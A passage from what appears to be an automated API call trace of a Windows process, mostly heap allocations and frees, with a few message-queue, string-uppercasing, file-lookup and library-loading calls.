(HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0212.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0212.535] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0212.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0212.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0212.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0212.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0212.536] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0212.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0212.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0212.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0212.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0212.536] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0212.536] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0212.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0212.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0212.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0212.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0212.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0212.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0212.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0212.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0212.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.538] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0212.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0212.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0212.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0212.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0212.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0212.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0212.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0212.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0212.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0212.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0212.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0212.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0212.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0212.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0212.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0212.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0212.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0212.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0212.540] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0212.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0212.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0212.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0212.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0212.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0212.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0212.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0212.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.541] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0212.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0212.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0212.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0212.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0212.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0212.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0212.542] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0212.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0212.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0212.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0212.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.543] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.543] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9e2078 [0212.543] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0212.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0212.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0212.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0212.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0212.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0212.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0212.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0212.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0212.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0212.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0212.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0212.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0212.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0212.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0212.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.547] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.547] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0212.547] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.548] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0212.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0212.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.549] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0212.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: 